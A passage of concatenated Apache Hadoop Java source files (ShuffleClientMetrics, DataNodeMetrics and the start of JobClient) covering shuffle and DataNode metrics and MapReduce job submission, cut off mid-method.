*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred.task.reduce;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hadoop.mapreduce.TaskAttemptID;
import org.apache.hadoop.metrics.MetricsContext;
import org.apache.hadoop.metrics.MetricsRecord;
import org.apache.hadoop.metrics.MetricsUtil;
import org.apache.hadoop.metrics.Updater;
class ShuffleClientMetrics implements Updater
{
private MetricsRecord shuffleMetrics = null;
private int numFailedFetches = 0;
private int numSuccessFetches = 0;
private long numBytes = 0;
private int numThreadsBusy = 0;
private final int numCopiers;
ShuffleClientMetrics(TaskAttemptID reduceId, JobConf jobConf)
{
this.numCopiers = jobConf.getInt("mapred.reduce.parallel.copies", 5);
MetricsContext metricsContext = MetricsUtil.getContext("mapred");
this.shuffleMetrics = MetricsUtil.createRecord(metricsContext, "shuffleInput");
this.shuffleMetrics.setTag("user", jobConf.getUser());
this.shuffleMetrics.setTag("jobName", jobConf.getJobName());
this.shuffleMetrics.setTag("jobId", reduceId.getJobID().toString());
this.shuffleMetrics.setTag("taskId", reduceId.toString());
this.shuffleMetrics.setTag("sessionId", jobConf.getSessionId());
metricsContext.registerUpdater(this);
}
public synchronized void inputBytes(long numBytes)
{
this.numBytes += numBytes;
}
public synchronized void failedFetch()
{
++numFailedFetches;
}
public synchronized void successFetch()
{
++numSuccessFetches;
}
public synchronized void threadBusy()
{
++numThreadsBusy;
}
public synchronized void threadFree()
{
--numThreadsBusy;
}
public void doUpdates(MetricsContext unused)
{
synchronized (this)
{
shuffleMetrics.incrMetric("shuffle_input_bytes", numBytes);
shuffleMetrics.incrMetric("shuffle_failed_fetches", numFailedFetches);
shuffleMetrics.incrMetric("shuffle_success_fetches", numSuccessFetches);
if (numCopiers != 0)
{
shuffleMetrics.setMetric("shuffle_fetchers_busy_percent",
100 * ((float) numThreadsBusy / numCopiers));
}
else
{
shuffleMetrics.setMetric("shuffle_fetchers_busy_percent", 0);
}
numBytes = 0;
numSuccessFetches = 0;
numFailedFetches = 0;
}
shuffleMetrics.update();
}
}
<|start_filename|>src/hdfs/org/apache/hadoop/hdfs/server/datanode/metrics/DataNodeMetrics.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.datanode.metrics;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.metrics.MetricsContext;
import org.apache.hadoop.metrics.MetricsRecord;
import org.apache.hadoop.metrics.MetricsUtil;
import org.apache.hadoop.metrics.Updater;
import org.apache.hadoop.metrics.jvm.JvmMetrics;
import org.apache.hadoop.metrics.util.MetricsBase;
import org.apache.hadoop.metrics.util.MetricsRegistry;
import org.apache.hadoop.metrics.util.MetricsTimeVaryingInt;
import org.apache.hadoop.metrics.util.MetricsTimeVaryingLong;
import org.apache.hadoop.metrics.util.MetricsTimeVaryingRate;
/**
*
* This class is for maintaining the various DataNode statistics
* and publishing them through the metrics interfaces.
* This also registers the JMX MBean for RPC.
* <p>
* This class has a number of metrics variables that are publicly accessible;
* these variables (objects) have methods to update their values;
* for example:
* <p> {@link #blocksRead}.inc()
*
*/
public class DataNodeMetrics implements Updater {
private final MetricsRecord metricsRecord;
private DataNodeActivityMBean datanodeActivityMBean;
public MetricsRegistry registry = new MetricsRegistry();
public MetricsTimeVaryingLong bytesWritten =
new MetricsTimeVaryingLong("bytes_written", registry);
public MetricsTimeVaryingLong bytesRead =
new MetricsTimeVaryingLong("bytes_read", registry);
public MetricsTimeVaryingInt blocksWritten =
new MetricsTimeVaryingInt("blocks_written", registry);
public MetricsTimeVaryingInt blocksRead =
new MetricsTimeVaryingInt("blocks_read", registry);
public MetricsTimeVaryingInt blocksReplicated =
new MetricsTimeVaryingInt("blocks_replicated", registry);
public MetricsTimeVaryingInt blocksRemoved =
new MetricsTimeVaryingInt("blocks_removed", registry);
public MetricsTimeVaryingInt blocksVerified =
new MetricsTimeVaryingInt("blocks_verified", registry);
public MetricsTimeVaryingInt blockVerificationFailures =
new MetricsTimeVaryingInt("block_verification_failures", registry);
public MetricsTimeVaryingInt readsFromLocalClient =
new MetricsTimeVaryingInt("reads_from_local_client", registry);
public MetricsTimeVaryingInt readsFromRemoteClient =
new MetricsTimeVaryingInt("reads_from_remote_client", registry);
public MetricsTimeVaryingInt writesFromLocalClient =
new MetricsTimeVaryingInt("writes_from_local_client", registry);
public MetricsTimeVaryingInt writesFromRemoteClient =
new MetricsTimeVaryingInt("writes_from_remote_client", registry);
public MetricsTimeVaryingInt volumeFailures =
new MetricsTimeVaryingInt("volumeFailures", registry);
public MetricsTimeVaryingRate readBlockOp =
new MetricsTimeVaryingRate("readBlockOp", registry);
public MetricsTimeVaryingRate writeBlockOp =
new MetricsTimeVaryingRate("writeBlockOp", registry);
public MetricsTimeVaryingRate blockChecksumOp =
new MetricsTimeVaryingRate("blockChecksumOp", registry);
public MetricsTimeVaryingRate copyBlockOp =
new MetricsTimeVaryingRate("copyBlockOp", registry);
public MetricsTimeVaryingRate replaceBlockOp =
new MetricsTimeVaryingRate("replaceBlockOp", registry);
public MetricsTimeVaryingRate heartbeats =
new MetricsTimeVaryingRate("heartBeats", registry);
public MetricsTimeVaryingRate blockReports =
new MetricsTimeVaryingRate("blockReports", registry);
public DataNodeMetrics(Configuration conf, String datanodeName) {
String sessionId = conf.get("session.id");
// Initiate reporting of Java VM metrics
JvmMetrics.init("DataNode", sessionId);
// Now the MBean for the data node
datanodeActivityMBean = new DataNodeActivityMBean(registry, datanodeName);
// Create record for DataNode metrics
MetricsContext context = MetricsUtil.getContext("dfs");
metricsRecord = MetricsUtil.createRecord(context, "datanode");
metricsRecord.setTag("sessionId", sessionId);
context.registerUpdater(this);
}
public void shutdown() {
if (datanodeActivityMBean != null)
datanodeActivityMBean.shutdown();
}
/**
* Since this object is a registered updater, this method will be called
* periodically, e.g. every 5 seconds.
*/
public void doUpdates(MetricsContext unused) {
synchronized (this) {
for (MetricsBase m : registry.getMetricsList()) {
m.pushMetric(metricsRecord);
}
}
metricsRecord.update();
}
public void resetAllMinMax() {
readBlockOp.resetMinMax();
writeBlockOp.resetMinMax();
blockChecksumOp.resetMinMax();
copyBlockOp.resetMinMax();
replaceBlockOp.resetMinMax();
heartbeats.resetMinMax();
blockReports.resetMinMax();
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/JobClient.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.OutputStreamWriter;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URL;
import java.net.URLConnection;
import java.net.UnknownHostException;
import java.util.Arrays;
import java.util.Collection;
import java.util.Comparator;
import java.util.List;
import java.util.Map;
import java.security.PrivilegedExceptionAction;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.conf.Configured;
import org.apache.hadoop.filecache.DistributedCache;
import org.apache.hadoop.filecache.TrackerDistributedCacheManager;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.permission.FsPermission;
import org.apache.hadoop.mapreduce.security.token.delegation.DelegationTokenIdentifier;
import org.apache.hadoop.hdfs.DFSClient;
import org.apache.hadoop.io.IOUtils;
import org.apache.hadoop.io.Text;
import org.apache.hadoop.ipc.RPC;
import org.apache.hadoop.ipc.RemoteException;
import org.apache.hadoop.mapred.Counters.Counter;
import org.apache.hadoop.mapred.Counters.Group;
import org.apache.hadoop.mapred.QueueManager.QueueACL;
import org.apache.hadoop.mapreduce.InputFormat;
import org.apache.hadoop.mapreduce.InputSplit;
import org.apache.hadoop.mapreduce.JobContext;
import org.apache.hadoop.mapreduce.JobSubmissionFiles;
import org.apache.hadoop.mapreduce.security.TokenCache;
import org.apache.hadoop.mapreduce.split.JobSplitWriter;
import org.apache.hadoop.net.NetUtils;
import org.apache.hadoop.security.AccessControlException;
import org.apache.hadoop.security.Credentials;
import org.apache.hadoop.security.UserGroupInformation;
import org.apache.hadoop.security.authorize.AccessControlList;
import org.apache.hadoop.security.token.Token;
import org.apache.hadoop.security.token.SecretManager.InvalidToken;
import org.apache.hadoop.util.ReflectionUtils;
import org.apache.hadoop.util.StringUtils;
import org.apache.hadoop.util.Tool;
import org.apache.hadoop.util.ToolRunner;
import org.codehaus.jackson.JsonParseException;
import org.codehaus.jackson.map.JsonMappingException;
import org.codehaus.jackson.map.ObjectMapper;
/**
* <code>JobClient</code> is the primary interface for the user-job to interact
* with the {@link JobTracker}.
*
* <code>JobClient</code> provides facilities to submit jobs, track their
* progress, access component-tasks' reports/logs, get the Map-Reduce cluster
* status information etc.
*
* <p>The job submission process involves:
* <ol>
* <li>
* Checking the input and output specifications of the job.
* </li>
* <li>
* Computing the {@link InputSplit}s for the job.
* </li>
* <li>
* Setup the requisite accounting information for the {@link DistributedCache}
* of the job, if necessary.
* </li>
* <li>
* Copying the job's jar and configuration to the map-reduce system directory
* on the distributed file-system.
* </li>
* <li>
* Submitting the job to the <code>JobTracker</code> and optionally monitoring
* it's status.
* </li>
* </ol></p>
*
* Normally the user creates the application, describes various facets of the
* job via {@link JobConf} and then uses the <code>JobClient</code> to submit
* the job and monitor its progress.
*
* <p>Here is an example on how to use <code>JobClient</code>:</p>
* <p><blockquote><pre>
* // Create a new JobConf
* JobConf job = new JobConf(new Configuration(), MyJob.class);
*
* // Specify various job-specific parameters
* job.setJobName("myjob");
*
* job.setInputPath(new Path("in"));
* job.setOutputPath(new Path("out"));
*
* job.setMapperClass(MyJob.MyMapper.class);
* job.setReducerClass(MyJob.MyReducer.class);
*
* // Submit the job, then poll for progress until the job is complete
* JobClient.runJob(job);
* </pre></blockquote></p>
*
* <h4 id="JobControl">Job Control</h4>
*
* <p>At times clients would chain map-reduce jobs to accomplish complex tasks
* which cannot be done via a single map-reduce job. This is fairly easy since
* the output of the job, typically, goes to distributed file-system and that
* can be used as the input for the next job.</p>
*
* <p>However, this also means that the onus on ensuring jobs are complete
* (success/failure) lies squarely on the clients. In such situations the
* various job-control options are:
* <ol>
* <li>
* {@link #runJob(JobConf)} : submits the job and returns only after
* the job has completed.
* </li>
* <li>
* {@link #submitJob(JobConf)} : only submits the job, then poll the
* returned handle to the {@link RunningJob} to query status and make
* scheduling decisions.
* </li>
* <li>
* {@link JobConf#setJobEndNotificationURI(String)} : setup a notification
* on job-completion, thus avoiding polling.
* </li>
* </ol></p>
*
* @see JobConf
* @see ClusterStatus
* @see Tool
* @see DistributedCache
*/
public class JobClient extends Configured implements MRConstants, Tool {
private static final Log LOG = LogFactory.getLog(JobClient.class);
public static enum TaskStatusFilter { NONE, KILLED, FAILED, SUCCEEDED, ALL }
private TaskStatusFilter taskOutputFilter = TaskStatusFilter.FAILED;
private static final long MAX_JOBPROFILE_AGE = 1000 * 2;
static{
Configuration.addDefaultResource("mapred-default.xml");
Configuration.addDefaultResource("mapred-site.xml");
}
/** The interval at which monitorAndPrintJob() prints status */
private int progMonitorPollIntervalMillis;
/** Default progMonitorPollIntervalMillis is 1000 ms. */
private static final int DEFAULT_MONITOR_POLL_INTERVAL = 1000;
/** Key in mapred-*.xml that sets progMonitorPollIntervalMillis */
static final String PROGRESS_MONITOR_POLL_INTERVAL_KEY =
"jobclient.progress.monitor.poll.interval";
/**
* A NetworkedJob is an implementation of RunningJob. It holds
* a JobProfile object to provide some info, and interacts with the
* remote service to provide certain functionality.
*/
class NetworkedJob implements RunningJob {
JobProfile profile;
JobStatus status;
long statustime;
/** The interval at which NetworkedJob.waitForCompletion() should check. */
private int completionPollIntervalMillis;
/** Default completionPollIntervalMillis is 5000 ms. */
private static final int DEFAULT_COMPLETION_POLL_INTERVAL = 5000;
/** Key in mapred-*.xml that sets completionPollInvervalMillis */
static final String COMPLETION_POLL_INTERVAL_KEY = "jobclient.completion.poll.interval";
/**
* We store a JobProfile and a timestamp for when we last
* acquired the job profile. If the job is null, then we cannot
* perform any of the tasks. The job might be null if the JobTracker
* has completely forgotten about the job. (eg, 24 hours after the
* job completes.)
*/
public NetworkedJob(JobStatus job) throws IOException {
this.status = job;
this.profile = jobSubmitClient.getJobProfile(job.getJobID());
this.statustime = System.currentTimeMillis();
// Set the completion poll interval from the configuration.
// Default is 5 seconds.
Configuration conf = JobClient.this.getConf();
this.completionPollIntervalMillis = conf.getInt(COMPLETION_POLL_INTERVAL_KEY,
DEFAULT_COMPLETION_POLL_INTERVAL);
if (this.completionPollIntervalMillis < 1) {
LOG.warn(COMPLETION_POLL_INTERVAL_KEY + " has been set to an invalid value; "
+ "replacing with " + DEFAULT_COMPLETION_POLL_INTERVAL);
this.completionPollIntervalMillis = DEFAULT_COMPLETION_POLL_INTERVAL;
}
}
/**
* Some methods rely on having a recent job profile object. Refresh
* it, if necessary
*/
synchronized void ensureFreshStatus() throws IOException {
if (System.currentTimeMillis() - statustime > MAX_JOBPROFILE_AGE) {
updateStatus();
}
}
/** Some methods need to update status immediately. So, refresh
* immediately
* @throws IOException
*/
synchronized void updateStatus() throws IOException {
this.status = jobSubmitClient.getJobStatus(profile.getJobID());
this.statustime = System.currentTimeMillis();
}
/**
* An identifier for the job
*/
public JobID getID() {
return profile.getJobID();
}
/** @deprecated This method is deprecated and will be removed. Applications should
* rather use {@link #getID()}.*/
@Deprecated
public String getJobID() {
return profile.getJobID().toString();
}
/**
* The user-specified job name
*/
public String getJobName() {
return profile.getJobName();
}
/**
* The name of the job file
*/
public String getJobFile() {
return profile.getJobFile();
}
/**
* A URL where the job's status can be seen
*/
public String getTrackingURL() {
return profile.getURL().toString();
}
/**
* A float between 0.0 and 1.0, indicating the % of map work
* completed.
*/
public float mapProgress() throws IOException {
ensureFreshStatus();
return status.mapProgress();
}
/**
* A float between 0.0 and 1.0, indicating the % of reduce work
* completed.
*/
public float reduceProgress() throws IOException {
ensureFreshStatus();
return status.reduceProgress();
}
/**
* A float between 0.0 and 1.0, indicating the % of cleanup work
* completed.
*/
public float cleanupProgress() throws IOException {
ensureFreshStatus();
return status.cleanupProgress();
}
/**
* A float between 0.0 and 1.0, indicating the % of setup work
* completed.
*/
public float setupProgress() throws IOException {
ensureFreshStatus();
return status.setupProgress();
}
/**
* Returns immediately whether the whole job is done yet or not.
*/
public synchronized boolean isComplete() throws IOException {
updateStatus();
return (status.getRunState() == JobStatus.SUCCEEDED ||
status.getRunState() == JobStatus.FAILED ||
status.getRunState() == JobStatus.KILLED);
}
/**
* True iff job completed successfully.
*/
public synchronized boolean isSuccessful() throws IOException {
updateStatus();
return status.getRunState() == JobStatus.SUCCEEDED;
}
/**
* Blocks until the job is finished
*/
public void waitForCompletion() throws IOException {
while (!isComplete()) {
try {
Thread.sleep(this.completionPollIntervalMillis);
} catch (InterruptedException ie) {
}
}
}
/**
* Tells the service to get the state of the current job.
*/
public synchronized int getJobState() throws IOException {
updateStatus();
return status.getRunState();
}
/**
* Tells the service to terminate the current job.
*/
public synchronized void killJob() throws IOException {
jobSubmitClient.killJob(getID());
}
/** Set the priority of the job.
* @param priority new priority of the job.
*/
public synchronized void setJobPriority(String priority)
throws IOException {
jobSubmitClient.setJobPriority(getID(), priority);
}
/**
* Kill indicated task attempt.
* @param taskId the id of the task to kill.
* @param shouldFail if true the task is failed and added to failed tasks list, otherwise
* it is just killed, w/o affecting job failure status.
*/
public synchronized void killTask(TaskAttemptID taskId, boolean shouldFail) throws IOException {
jobSubmitClient.killTask(taskId, shouldFail);
}
/** @deprecated Applications should rather use {@link #killTask(TaskAttemptID, boolean)}*/
@Deprecated
public synchronized void killTask(String taskId, boolean shouldFail) throws IOException {
killTask(TaskAttemptID.forName(taskId), shouldFail);
}
/**
* Fetch task completion events from jobtracker for this job.
*/
public synchronized TaskCompletionEvent[] getTaskCompletionEvents(
int startFrom) throws IOException{
return jobSubmitClient.getTaskCompletionEvents(
getID(), startFrom, 10);
}
/**
* Dump stats to screen
*/
@Override
public String toString() {
try {
updateStatus();
} catch (IOException e) {
}
return "Job: " + profile.getJobID() + "\n" +
"file: " + profile.getJobFile() + "\n" +
"tracking URL: " + profile.getURL() + "\n" +
"map() completion: " + status.mapProgress() + "\n" +
"reduce() completion: " + status.reduceProgress();
}
/**
* Returns the counters for this job
*/
public Counters getCounters() throws IOException {
return jobSubmitClient.getJobCounters(getID());
}
@Override
public String[] getTaskDiagnostics(TaskAttemptID id) throws IOException {
return jobSubmitClient.getTaskDiagnostics(id);
}
@Override
public String getFailureInfo() throws IOException {
//assuming that this is just being called after
//we realized the job failed. SO we try avoiding
//a rpc by not calling updateStatus
ensureFreshStatus();
return status.getFailureInfo();
}
}
private JobSubmissionProtocol jobSubmitClient;
private Path sysDir = null;
private Path stagingAreaDir = null;
private FileSystem fs = null;
private UserGroupInformation ugi;
private static final String TASKLOG_PULL_TIMEOUT_KEY =
"mapreduce.client.tasklog.timeout";
private static final int DEFAULT_TASKLOG_TIMEOUT = 60000;
static int tasklogtimeout;
/**
* Create a job client.
*/
public JobClient() {
this.progMonitorPollIntervalMillis = DEFAULT_MONITOR_POLL_INTERVAL;
}
/**
* Build a job client with the given {@link JobConf}, and connect to the
* default {@link JobTracker}.
*
* @param conf the job configuration.
* @throws IOException
*/
public JobClient(JobConf conf) throws IOException {
setConf(conf);
init(conf);
}
/**
* Connect to the default {@link JobTracker}.
* @param conf the job configuration.
* @throws IOException
*/
public void init(JobConf conf) throws IOException {
String tracker = conf.get("mapred.job.tracker", "local");
tasklogtimeout = conf.getInt(
TASKLOG_PULL_TIMEOUT_KEY, DEFAULT_TASKLOG_TIMEOUT);
this.ugi = UserGroupInformation.getCurrentUser();
if ("local".equals(tracker)) {
conf.setNumMapTasks(1);
this.jobSubmitClient = new LocalJobRunner(conf);
} else {
this.jobSubmitClient = createRPCProxy(JobTracker.getAddress(conf), conf);
}
// Read progress monitor poll interval from config. Default is 1 second.
this.progMonitorPollIntervalMillis = conf.getInt(PROGRESS_MONITOR_POLL_INTERVAL_KEY,
DEFAULT_MONITOR_POLL_INTERVAL);
if (this.progMonitorPollIntervalMillis < 1) {
LOG.warn(PROGRESS_MONITOR_POLL_INTERVAL_KEY + " has been set to an invalid value; "
+ " replacing with " + DEFAULT_MONITOR_POLL_INTERVAL);
this.progMonitorPollIntervalMillis = DEFAULT_MONITOR_POLL_INTERVAL;
}
}
private JobSubmissionProtocol createRPCProxy(InetSocketAddress addr,
Configuration conf) throws IOException {
return (JobSubmissionProtocol) RPC.getProxy(JobSubmissionProtocol.class,
JobSubmissionProtocol.versionID, addr,
UserGroupInformation.getCurrentUser(), conf,
NetUtils.getSocketFactory(conf, JobSubmissionProtocol.class));
}
/**
* Build a job client, connect to the indicated job tracker.
*
* @param jobTrackAddr the job tracker to connect to.
* @param conf configuration.
*/
public JobClient(InetSocketAddress jobTrackAddr,
Configuration conf) throws IOException {
this.ugi = UserGroupInformation.getCurrentUser();
jobSubmitClient = createRPCProxy(jobTrackAddr, conf);
}
/**
* Close the <code>JobClient</code>.
*/
public synchronized void close() throws IOException {
if (!(jobSubmitClient instanceof LocalJobRunner)) {
RPC.stopProxy(jobSubmitClient);
}
}
/**
* Get a filesystem handle. We need this to prepare jobs
* for submission to the MapReduce system.
*
* @return the filesystem handle.
* @throws IOException
*/
public synchronized FileSystem getFs() throws IOException {
if (this.fs == null) {
try {
this.fs = ugi.doAs(new PrivilegedExceptionAction<FileSystem>() {
public FileSystem run() throws IOException {
Path sysDir = getSystemDir();
return sysDir.getFileSystem(getConf());
}
});
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
}
return this.fs;
}
/* see if two file systems are the same or not
*
*/
private boolean compareFs(FileSystem srcFs, FileSystem destFs) {
URI srcUri = srcFs.getUri();
URI dstUri = destFs.getUri();
if (srcUri.getScheme() == null) {
return false;
}
if (!srcUri.getScheme().equals(dstUri.getScheme())) {
return false;
}
String srcHost = srcUri.getHost();
String dstHost = dstUri.getHost();
if ((srcHost != null) && (dstHost != null)) {
try {
srcHost = InetAddress.getByName(srcHost).getCanonicalHostName();
dstHost = InetAddress.getByName(dstHost).getCanonicalHostName();
} catch(UnknownHostException ue) {
return false;
}
if (!srcHost.equals(dstHost)) {
return false;
}
}
else if (srcHost == null && dstHost != null) {
return false;
}
else if (srcHost != null && dstHost == null) {
return false;
}
//check for ports
if (srcUri.getPort() != dstUri.getPort()) {
return false;
}
return true;
}
// copies a file to the jobtracker filesystem and returns the path where it
// was copied to
private Path copyRemoteFiles(FileSystem jtFs, Path parentDir,
final Path originalPath, final JobConf job, short replication)
throws IOException, InterruptedException {
//check if we do not need to copy the files
// is jt using the same file system.
// just checking for uri strings... doing no dns lookups
// to see if the filesystems are the same. This is not optimal.
// but avoids name resolution.
FileSystem remoteFs = null;
remoteFs = originalPath.getFileSystem(job);
if (compareFs(remoteFs, jtFs)) {
return originalPath;
}
// this might have name collisions. copy will throw an exception
//parse the original path to create new path
Path newPath = new Path(parentDir, originalPath.getName());
FileUtil.copy(remoteFs, originalPath, jtFs, newPath, false, job);
jtFs.setReplication(newPath, replication);
return newPath;
}
private URI getPathURI(Path destPath, String fragment)
throws URISyntaxException {
URI pathURI = destPath.toUri();
if (pathURI.getFragment() == null) {
if (fragment == null) {
pathURI = new URI(pathURI.toString() + "#" + destPath.getName());
} else {
pathURI = new URI(pathURI.toString() + "#" + fragment);
}
}
return pathURI;
}
/**
* configure the jobconf of the user with the command line options of
* -libjars, -files, -archives
* @param job the JobConf
* @param submitJobDir
* @throws IOException
*/
private void copyAndConfigureFiles(JobConf job, Path jobSubmitDir)
throws IOException, InterruptedException {
short replication = (short)job.getInt("mapred.submit.replication", 10);
copyAndConfigureFiles(job, jobSubmitDir, replication);
// Set the working directory
if (job.getWorkingDirectory() == null) {
job.setWorkingDirectory(fs.getWorkingDirectory());
}
}
private void copyAndConfigureFiles(JobConf job, Path submitJobDir,
short replication) throws IOException, InterruptedException {
if (!(job.getBoolean("mapred.used.genericoptionsparser", false))) {
LOG.warn("Use GenericOptionsParser for parsing the arguments. " +
"Applications should implement Tool for the same.");
}
// Retrieve command line arguments placed into the JobConf
// by GenericOptionsParser.
String files = job.get("tmpfiles");
String libjars = job.get("tmpjars");
String archives = job.get("tmparchives");
//
// Figure out what fs the JobTracker is using. Copy the
// job to it, under a temporary name. This allows DFS to work,
// and under the local fs also provides UNIX-like object loading
// semantics. (that is, if the job file is deleted right after
// submission, we can still run the submission to completion)
//
// Create a number of filenames in the JobTracker's fs namespace
FileSystem fs = submitJobDir.getFileSystem(job);
LOG.debug("default FileSystem: " + fs.getUri());
if (fs.exists(submitJobDir)) {
throw new IOException("Not submitting job. Job directory " + submitJobDir
+" already exists!! This is unexpected.Please check what's there in" +
" that directory");
}
submitJobDir = fs.makeQualified(submitJobDir);
submitJobDir = new Path(submitJobDir.toUri().getPath());
FsPermission mapredSysPerms = new FsPermission(JobSubmissionFiles.JOB_DIR_PERMISSION);
FileSystem.mkdirs(fs, submitJobDir, mapredSysPerms);
Path filesDir = JobSubmissionFiles.getJobDistCacheFiles(submitJobDir);
Path archivesDir = JobSubmissionFiles.getJobDistCacheArchives(submitJobDir);
Path libjarsDir = JobSubmissionFiles.getJobDistCacheLibjars(submitJobDir);
// add all the command line files/ jars and archive
// first copy them to jobtrackers filesystem
if (files != null) {
FileSystem.mkdirs(fs, filesDir, mapredSysPerms);
String[] fileArr = files.split(",");
for (String tmpFile: fileArr) {
URI tmpURI;
try {
tmpURI = new URI(tmpFile);
} catch (URISyntaxException e) {
throw new IllegalArgumentException(e);
}
Path tmp = new Path(tmpURI);
Path newPath = copyRemoteFiles(fs,filesDir, tmp, job, replication);
try {
URI pathURI = getPathURI(newPath, tmpURI.getFragment());
DistributedCache.addCacheFile(pathURI, job);
} catch(URISyntaxException ue) {
//should not throw a uri exception
throw new IOException("Failed to create uri for " + tmpFile, ue);
}
DistributedCache.createSymlink(job);
}
}
if (libjars != null) {
FileSystem.mkdirs(fs, libjarsDir, mapredSysPerms);
String[] libjarsArr = libjars.split(",");
for (String tmpjars: libjarsArr) {
Path tmp = new Path(tmpjars);
Path newPath = copyRemoteFiles(fs, libjarsDir, tmp, job, replication);
DistributedCache.addFileToClassPath(
new Path(newPath.toUri().getPath()), job, fs);
}
}
if (archives != null) {
FileSystem.mkdirs(fs, archivesDir, mapredSysPerms);
String[] archivesArr = archives.split(",");
for (String tmpArchives: archivesArr) {
URI tmpURI;
try {
tmpURI = new URI(tmpArchives);
} catch (URISyntaxException e) {
throw new IllegalArgumentException(e);
}
Path tmp = new Path(tmpURI);
Path newPath = copyRemoteFiles(fs, archivesDir, tmp, job, replication);
try {
URI pathURI = getPathURI(newPath, tmpURI.getFragment());
DistributedCache.addCacheArchive(pathURI, job);
} catch(URISyntaxException ue) {
//should not throw an uri excpetion
throw new IOException("Failed to create uri for " + tmpArchives, ue);
}
DistributedCache.createSymlink(job);
}
}
// First we check whether the cached archives and files are legal.
TrackerDistributedCacheManager.validate(job);
// set the timestamps of the archives and files
TrackerDistributedCacheManager.determineTimestamps(job);
// set the public/private visibility of the archives and files
TrackerDistributedCacheManager.determineCacheVisibilities(job);
// get DelegationTokens for cache files
TrackerDistributedCacheManager.getDelegationTokens(job,
job.getCredentials());
String originalJarPath = job.getJar();
if (originalJarPath != null) { // copy jar to JobTracker's fs
// use jar name if job is not named.
if ("".equals(job.getJobName())){
job.setJobName(new Path(originalJarPath).getName());
}
Path submitJarFile = JobSubmissionFiles.getJobJar(submitJobDir);
job.setJar(submitJarFile.toString());
fs.copyFromLocalFile(new Path(originalJarPath), submitJarFile);
fs.setReplication(submitJarFile, replication);
fs.setPermission(submitJarFile,
new FsPermission(JobSubmissionFiles.JOB_FILE_PERMISSION));
} else {
LOG.warn("No job jar file set. User classes may not be found. "+
"See JobConf(Class) or JobConf#setJar(String).");
}
}
/**
* Submit a job to the MR system.
*
* This returns a handle to the {@link RunningJob} which can be used to track
* the running-job.
*
* @param jobFile the job configuration.
* @return a handle to the {@link RunningJob} which can be used to track the
* running-job.
* @throws FileNotFoundException
* @throws InvalidJobConfException
* @throws IOException
*/
public RunningJob submitJob(String jobFile) throws FileNotFoundException,
InvalidJobConfException,
IOException {
// Load in the submitted job details
JobConf job = new JobConf(jobFile);
return submitJob(job);
}
/**
* Submit a job to the MR system.
* This returns a handle to the {@link RunningJob} which can be used to track
* the running-job.
*
* @param job the job configuration.
* @return a handle to the {@link RunningJob} which can be used to track the
* running-job.
* @throws FileNotFoundException
* @throws IOException
*/
public RunningJob submitJob(JobConf job) throws FileNotFoundException,
IOException {
try {
return submitJobInternal(job);
} catch (InterruptedException ie) {
throw new IOException("interrupted", ie);
} catch (ClassNotFoundException cnfe) {
throw new IOException("class not found", cnfe);
}
}
/**
* Internal method for submitting jobs to the system.
* @param job the configuration to submit
* @return a proxy object for the running job
* @throws FileNotFoundException
* @throws ClassNotFoundException
* @throws InterruptedException
* @throws IOException
*/
public
RunningJob submitJobInternal(final JobConf job
) throws FileNotFoundException,
ClassNotFoundException,
InterruptedException,
IOException {
/*
* configure the command line options correctly on the submitting dfs
*/
return ugi.doAs(new PrivilegedExceptionAction<RunningJob>() {
public RunningJob run() throws FileNotFoundException,
ClassNotFoundException,
InterruptedException,
IOException{
JobConf jobCopy = job;
Path jobStagingArea = JobSubmissionFiles.getStagingDir(JobClient.this,
jobCopy);
JobID jobId = jobSubmitClient.getNewJobId();
Path submitJobDir = new Path(jobStagingArea, jobId.toString());
jobCopy.set("mapreduce.job.dir", submitJobDir.toString());
JobStatus status = null;
try {
populateTokenCache(jobCopy, jobCopy.getCredentials());
copyAndConfigureFiles(jobCopy, submitJobDir);
// get delegation token for the dir
TokenCache.obtainTokensForNamenodes(jobCopy.getCredentials(),
new Path [] {submitJobDir},
jobCopy);
Path submitJobFile = JobSubmissionFiles.getJobConfPath(submitJobDir);
int reduces = jobCopy.getNumReduceTasks();
InetAddress ip = InetAddress.getLocalHost();
if (ip != null) {
job.setJobSubmitHostAddress(ip.getHostAddress());
job.setJobSubmitHostName(ip.getHostName());
}
JobContext context = new JobContext(jobCopy, jobId);
jobCopy = (JobConf)context.getConfiguration();
// Check the output specification
